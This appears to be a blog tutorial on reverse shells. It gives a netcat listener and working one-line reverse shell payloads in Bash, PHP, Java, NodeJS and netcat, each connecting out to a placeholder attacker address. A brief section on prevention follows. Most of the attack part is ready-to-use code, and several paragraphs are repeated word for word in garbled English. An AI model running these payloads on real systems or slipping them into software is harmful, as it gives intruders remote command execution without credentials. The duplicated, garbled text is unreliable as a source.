A reverse shell is a shell session established on a connection.
Reverse Shell connection is similar to ssh connection.
Reverse Shell connection is similar to ssh connection.
After we estimated successfully ssh connection, we can execute commands.
reverse shell can execute commands as ssh.
ssh need credentials, reverse shell does not need credentials.
Reverse shells can also work across a NAT or firewall.
Please check the following command for reverse shell in different environments.
In this article,
our public server's ip address is xxx.xxx.xxx.xxx and we will listen it from port 80.
reverse shell can execute commands as ssh.
ssh need credentials, reverse shell does not need credentials.
Reverse shells can also work across a NAT or firewall.
Please check the following command for reverse shell in different environments.
In this article,
our public server's ip address is xxx.xxx.xxx.xxx and we will listen it from port 80.
our public server side listen connection
nc -lvp 80While we are listing connection from our public svr port 80,
we have to make reverse shell from remote sever.
The following command is for the remote server.
we have to make reverse shell from remote sever.
The following command is for the remote server.
Bash Reverse Shell
/bin/bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/80 0>&1 PHP Reverse Shell
php -r '$sock=fsockopen(\"xxx.xxx.xxx.xxx\",80);exec(\"/bin/sh -i <&3 >&3 2>&3\");' Java Reverse Shell
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.17.1/1337;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor() NodeJS Reverse Shell
(function(){
const net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
const client = new net.Socket();
client.connect(80, "xxx.xxx.xxx.xxx", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();
or
require('child_process').exec('nc -e /bin/sh xxx.xxx.xxx.xxx 80')
or
-var x = global.process.mainModule.require
-x('child_process').exec('nc xxx.xxx.xxx.xxx 80 -e /bin/bash') How to prevent it?
In general, a reverse shell on its own is not malicious and can also be used for legitimate purposes, for example, for remote server administration.
If you don't need to use reverse shells, you can try to limit the possibility to create them but it is very difficult:
If you don't need to use reverse shells, you can try to limit the possibility to create them but it is very difficult:
- You can impose strict control of outgoing connections.
However, this is only possible for very specialized servers.
And there is nothing to stop the attacker from opening a listener on a common port such as 80. In such a case, all connections would have to be monitored for content as well. - You can disable most tools that make it possible to create a reverse shell, but again this is only possible for very specialized servers. As you can see above, reverse shells can be created using different tools and languages. Therefore, you may make it more difficult for the attacker, but not impossible.
- Setting up your webserver in the private subnet.
I hope this article would help your need.
Thank you for taking the time to read my article. I hope you find it helpful. Please feel free to reach out if you have any questions or would like to discuss further.
Thank you for taking the time to read my article. I hope you find it helpful. Please feel free to reach out if you have any questions or would like to discuss further.
